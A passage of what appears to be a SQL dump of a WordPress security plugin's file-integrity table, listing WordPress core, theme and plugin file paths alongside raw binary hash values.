_L}�^!���^�D','',0,'?'),('r�7޲���\0ᄌ��','wp-content/themes/nirvana/languages/zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��l��IX�ʐ�P/','��}a5/������)~��d�*����\nA\'���','',0,'?'),('rɁ��h����\r�͌�','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-webconfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&���M��uE�D�','$[O�=��K3�B���Э�����Pc���','',0,'?'),('r�Ȳ�Dw\">EW��L�','wp-content/themes/nirvana/fonts/opensans-light-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����5���,!�z','�Z7�6��B;�K͠g�Ow\r�~�^����c�\"','',0,'?'),('r�-:v�/<�Ek��f','wp-content/themes/supernews/assets/js/acme-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GG\0�\"ص9�w3�h^','���G�H��U2-���m�As�|Y;�B���','',0,'?'),('r�8�����G���a�','wp-content/themes/illdy/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ظQp�F̱���T��G','�?��>D�$=цg	��.�q5�W�y�ؚ�k�','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5����gQ�L���','l��xda�n{:@G�6�D��9I—','',0,'?'),('r���~�s�n;ɭ� �','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-done.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C����FPB���','tjh�ny7�h_��N{��?��d�ٟ+�?dQ','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�~��?m��:9YK','wp-content/themes/fabulous-fluid/js/jquery.sidr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��� Žp�V�÷','��&f�=#]�??�/�G\0#{\0�%u�b�','',0,'?'),('r������t���0�6','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/entity/class-fw-ext-backups-task.php',0,'���b� >భ|���rL','���b� >భ|���rL','!����m\r~*tKό�~F<�t��3��bpl','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r���L��,�R�}','wp-content/plugins/spam-captcha/core/css/otherplugins_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AG��)��7nJ=jn�',' )\'���$#E���x��\"��W��_�y;��','',0,'?'),('r�YnkB�Y�j5���','wp-content/themes/aqueduct/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6g���c�?c@','�6��+��^K�C����b��è�)�K��','',0,'?'),('r�V��7�k�<\nb�n','wp-content/themes/relia/sidebar-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IgA���R*fI�S','��g��������tZ��\'��s�����soN��','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ի�j��_g����_','=Շ����:��f~Do��_1��E�^`�Wk��','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�b�ar����\Z\"U�&<','_����9KY�Y��HBQD{e�!�$!�_8�H','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('r�r[��-�@��N�','wp-content/plugins/login-lockdown/version.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�*S)��Yk�����','���ŃIK�T��D��#7��c�4̽W�g','',0,'?'),('s&�繗�DCl�s�H','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q+�ڹ�R�v^���<b','��\"���0�\';��a�A�\"�&M��T���\0�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s��5�frPl����','wp-content/themes/vega/assets/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����6��{��9AH','�\r�8��γe���y���̿ǹ��H����-�_','',0,'?'),('sh�,-N��$b�x|','wp-content/themes/hueman/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�-�CY=��nk','��ҟK0Ė�3�����&]��	�/@�w%��V�','',0,'?'),('s1��ڬR�|Q4L�:','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.bg.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tԉ��A�G�7=E(',',�5G\rH�Lë́��^����457�%��1щm���','',0,'?'),('s\"�j����_@hI�~�','wp-content/themes/barletta/fonts/glyphicons-halflings-regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�4�mi�)z�d�:��','�s-N=ip��f�7{��άTO���@��x�<X','',0,'?'),('sG\\��J��Hy-?m.','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.co.php',0,'���qr���}5��W','���qr���}5��W','��+��$���CZ��==⚼�Ĥ�v����l[','',0,'?'),('sN0HW�2��tX\'��?�','wp-content/themes/mh-magazine-lite/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�	`�Y�n��','K6�:�o�*�E�\\D���wg\Z�x�Q��@E��','',0,'?'),('sO�+	4m���@z�','wp-content/themes/supernews/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BԪ8�T�-Z��� ��','��z��4mB�K4�3F�rH�#}��E�','',0,'?'),('sfù;�n���8~�x','wp-content/themes/skt-construction-lite/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('sh���Hz�/߶��','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l5������B\n','d3��5�몙~��gϝ��T�V��.6<j%�','',0,'?'),('sp�<�n��s�a��j�','wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.tile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_kr��4 ���h\0�','\\���/J�FQ!X��H�?y7iT)ST�k��','',0,'?'),('s�\"L���8/l��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fi.js',0,'�V׋6گ\\-V�b��','�V׋6گ\\-V�b��','ҘŮ�������x�Z�!�� �[�W�}�','',0,'?'),('s����.wa��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.lib.php',0,'�K��1���5U�ґ','�K��1���5U�ґ','�R�̂\Z��Bv�j���vjo��pr8�x ���a','',0,'?'),('s��2K\n��l�F��u/G','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�@^ݕ�^Ơ��m�','��c�A��ei�ѝ��9,�{hU8�8*>r','',0,'?'),('s��ӣJ���~��k','wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�JJuw��&�R{��','w�ü}\Z�O�g��� f#�E�1g=g�Rz��F','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b!��ux�ϩ.r,�','�Z�4��}����Eۃ{F5�l�k�~ظ���','',0,'?'),('s��p�Z���HXdx�T','wp-content/themes/hueman/assets/front/img/header/bridge-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oF��_��PҴH�O','��Q�����h�M�.u^Ȯ}��>��5-�','',0,'?'),('s��(:ӣ$������\r','wp-content/themes/twentynineteen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����t���̬��`','��Ș���?ut�H���N��X*\nO\r����?','',0,'?'),('s�V���Q�Ν�7p!','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-addon-section.php',0,'4�%@MY)��n�V�B','4�%@MY)��n�V�B','XpBϧG���2�緐�P ���Ƙ�v\0S','',0,'?'),('s��sdW��|�loNyb','wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/static.php',0,'��g�3AM�˷����','��g�3AM�˷����','d����#�1�7x�_�����#۝���̱�\\+�','',0,'?'),('s�]��P�f���\n','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�+<����>3���K','w�0�̃�|^�;�Ym����n�L��i2��4�','',0,'?'),('s��ז��:����h�S','wp-content/plugins/contact-form-7/includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{m,2%i2���z6�=�','��n�׋�\'����b�	 ܅f�|zVBs|','',0,'?'),('s�_?6E�������b�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/fullscreen.js',0,'\'�\r{��Ǻ�����I�','\'�\r{��Ǻ�����I�','��Ih���!|�>�nJ�?���Y�i�֞A��','',0,'?'),('s�0yl�ꃋD\\��\"','wp-content/plugins/wordpress-seo/wp-seo-main.php',0,'g�V-�(ׂ�9q<�','g�V-�(ׂ�9q<�','��c>�����6.`9������m���pyxb�v','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s�2�0<ǧ&��ZO','wp-content/themes/mh-magazine-lite/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('s�0d����i4t�L','wp-content/themes/wen-business/third-party/font-awesome/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��<k�O�	��,\'��','���Y.�e���{Zܾ9b\"JUG���\r1�YL�','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ԗ�΁$����','�\"U�T��������KЃ�۔݈^ߺL��','',0,'?'),('s��d�����k�	','wp-content/plugins/unyson/framework/includes/option-types/addable-popup/static/js/addable-popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��̨�~��*J���R','̈�/Y<f�QJcXÞ<���O���(=','',0,'?'),('ta�˞a郛��|�E','wp-content/themes/hueman/assets/czr/css/lib/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�F�J��.��1�','L�}���߈Z���w�r?u��������','',0,'?'),('t��<��G��I�','wp-content/themes/wen-business/inc/customizer/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n[����Z�NO_�','p�����X�T��>Jk �\Z>/H�r�k��','',0,'?'),('t\r�[��Ձ9*5W�b��','wp-includes/block-patterns/text-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('t�L�#�]	��TV��','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-platform-tabs.php',0,'��:>�z\n��w�','��:>�z\n��w�','.5����J��4�8-|��2XM���Ы]�<N','',0,'?'),('t�b��hn~㔜�\0','wp-content/themes/accelerate/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�g��\\�2\\�w','�KƇ�LH���tj���TӠ{:��R���l','',0,'?'),('t�ïm�m�.���','wp-content/themes/relia/inc/css/temps/purple.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڧ�\r��p\n	b��P�','/��w�d�y�0�:HU;\Z�nh�q�(�','',0,'?'),('t$[��ኞp%P���','wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('t+r�BV#��?֪=ja}','wp-content/themes/fluida/resources/fonts/blocks.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�1\'�4w��8)���','���v�眘��\n8U��X ��m��גP�Gm','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�4ߪu,�+:�^�:;','x�S��4e�b,�S,8�?�-��\"�Qn','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��C�Y�B�T�f�','̻d8\Z�n���4� 8�>��)3���ښ','',0,'?'),('t9,�frpf�ʝ%��','wp-content/plugins/unyson/framework/core/components/extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nCq@�=F\nl����v','p�Q]��9�>G`���=[!�(($�D!�,�l�','',0,'?'),('tA�yl��֩��X','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/qtips.js',0,'v�����x��Q�','v�����x��Q�','.Mf�9��o���HI<I\')��PA��k','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��6\"%Lt}VEQ�Գ�','��VSt��_��p���sy�26�j����v','',0,'?'),('tm�\n��GO	\'�\Z޵','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('tr��iG,C��s�\\��','wp-content/themes/alpha-store/lib/welcome/img/kakina.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Q�� W�n��M�n�','�R{#��n���{�a.�����gY��\"tC�4&�','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('t��a���T�G��E�','wp-content/themes/the-minimal/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��C�� ��m��','���!1��:I���ݑe\0&�\r�/��(K�','',0,'?'),('t��)Ϩ��!�VV\"[G&','wp-content/themes/relia/inc/relia/relia.php',0,'��M�!��#A������','��M�!��#A������','���#���%�/3}�l�I�zx�\'Lֈ�c','',0,'?'),('t������ӧLAKA!%0','wp-content/plugins/all-in-one-wp-migration/lib/controller/class-ai1wm-backups-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��Y��`��Ί�|','�դC���T2�;�c�L�B`�OίP�3','',0,'?'),('t�a���6�����ܛ','wp-content/plugins/wordpress-seo/js/dist/wp-seo-metabox-category-350.min.js',0,'_�3����_H�2�1','_�3����_H�2�1','�Ǣ����gz�?�+�z��i��%0���f','',0,'?'),('t����婹��:0�̌','wp-content/plugins/spam-captcha/core/css/tabs_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DI��V�a�����','q���w?Ƽ�7���\0��z)%,Ϡ�9%�D\\(�','',0,'?'),('t�sR8��e�\r-	*�','wp-content/themes/vega/parts/frontpage-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�|R����=��+a��','npM\nB��q��̅QI�W:�r4�GD�>)','',0,'?'),('t�մ��~�Y�e�u1','wp-content/plugins/unyson/framework/includes/option-types/popup/views/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','޻�p��B���mD�','s���6��G��F�$?�����Fz*�o5&','',0,'?'),('t̩�03W���ޚ�p','wp-content/themes/fabulous-fluid/js/source/jquery.cycle/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','swu<�H�2����\r��','3�Чӫ��qY����!��ڰv\\w�=�� ','',0,'?'),('t� �<�	R�f�;œ','wp-content/themes/hueman/assets/front/img/demo/5-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �jp�\"��jF���#','�(�1��id��C$\"��7Bj�j˺�\Z�J{�5�','',0,'?'),('t�|���c���	�','wp-content/themes/the-minimal/images/quote-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��� �3Ό�h�','u��d��B�;2����~���1���k����','',0,'?'),('t��X�:l�Y/0	�u','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.sc.php',0,'`�p�;c���\'','`�p�;c���\'','G,�-�:�<��Toi	т�Q�9cùg','',0,'?'),('t�۴\'q! �$�\03#','wp-content/plugins/dw-social-share/assets/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('t�\'��k(!��i','wp-content/plugins/unyson/framework/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�ۿ z����0L�u4�','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N	�\'G','�fX��RZ�|:O�b��=f�[y���5 ~	','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('u2]�Kv�\0ݦ\rtP','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt-BR.js',0,'bK0b�#-�4�8*��','bK0b�#-�4�8*��','�1[{�<7�h-��\'\rs�_��»3r��t`','',0,'?'),('u8����ޚ�B�*�','wp-content/plugins/unyson/framework/includes/option-types/oembed/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZQ���c4�T:��)�','��ݾ�\r�?h�+��\r�J�7!�*<��܈රh3','',0,'?'),('uCne�M�$<�|��','wp-content/plugins/unyson/framework/static/libs/lnr/css/lnr.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&).R� bK�t�\n�','M����9缸�x�l!B?=O�\Z)��\n]�','',0,'?'),('uY��*80���H_UE','wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���\Z�|��xD','��ړ��,~�}��Gd}i�oY����e�+ϰ�','',0,'?'),('u[1��������;kN','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-dropbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x;g���w��\ZG��','��ZY03n\'�&��o�ŷ��;,�s���ʇ��1','',0,'?'),('u_��8[5Y�S�p{','wp-content/themes/morfeu/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�<y��&)���q�i','H�ˢu}K�h�Ć]�\0y#]%ָR:�n��','',0,'?'),('uapF��[t#��(q[','wp-content/plugins/wordpress-seo/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('ue�,\"\n	�h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&��΁�����������s-�','',0,'?'),('uu���KG��','wp-content/themes/clean-magazine/js/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�c5p�U;����<b�','��2Np�},pf�(�Ƚ�tZ���M�oVg�\r','',0,'?'),('u���yں�)l0a�','wp-content/themes/tortuga/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��\n,��J�','���͟��.��o}�Q��n�� �*�U8�c��/','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��:o;J��\n���b','[d�%>��[�l�����[�,0o_IX>ڦ2�','',0,'?'),('u�9cW�����j�\'7�','wp-content/plugins/dw-social-share/assets/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U: ̈́�l�RŔ��$��','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('u��sD_XsBbc+[\'�','wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('u��I5q�#��,>�','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɱ�\rA2���e','ʟ�]b���F��ң���^�Ex��D�','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�q~�)3_J�7��','wp-content/themes/relia/inc/js/jquery.slicknav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y2�ܘ\\K��ȟ�','eԱ\'�\\=/⡉K�)��\".�Y�v�d��X�','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('u�������m)Kli','wp-content/themes/hueman/assets/front/img/opacity-10.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�e%�Oׁ��8V&R','�}P�l���ulXm����IR��ܼd�ܗ�','',0,'?'),('u��,,��O^��N�o','wp-content/themes/lightly/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:$o����5Z{P�',' *��5��2��(]m�._�`�aX�\0{���5U��','',0,'?'),('u�j�%�f�Dq+l��','wp-content/themes/precious-lite/images/slides/slider3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F���r�,����','��x�`��Z�&��u�*���,���f9v���d','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���02�ʽJo�h`','�D�*�(�]��x9��g֛�h����W�:��','',0,'?'),('v��]��R���ҒG�','wp-content/themes/sg-window/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I���x\'�WIվ��','mU�\r���z����JFK�Ӓ��A�','',0,'?'),('v6j0~��ܛ�5����','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/builder.php',0,'-M3��wZ�煺9g','-M3��wZ�煺9g','����&��3��E�S\0o��i�&�-�v��','',0,'?'),('v:f\'��x36(�.L�~\'','wp-content/themes/nirvana/fonts/elusive.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̟�\Zc�S���(��','���7Z���WG�|ʃ�x%mֵ}�Q��\\`\Z���b','',0,'?'),('v@RS��j+x�Bkq�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/core.js',0,'���2rV�z����.�','���2rV�z����.�','�� #�m׊\n�}�=�M/�$�0bsH�(�','',0,'?'),('vB��2ލ%\0��ꇚ\"','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sv.js',0,'k���\"���u��$','k���\"���u��$','OHPV|����Є���w��,\r���~(��','',0,'?'),('vK;@�s�aU1;�	^�','wp-config.php',0,'{�\n������Ю�r','{�\n������Ю�r','pR1�U��D�\'�[}�>L�ei��?SU�X��','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('ve׶\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vo}��+���:�zS�','wp-content/themes/illdy/sections/front-page-services.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���zP�Q��5Ǵ@#V','��2�W*\Zkº�\r�\0kC_�1	\0ϫ�lρ��%��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u��	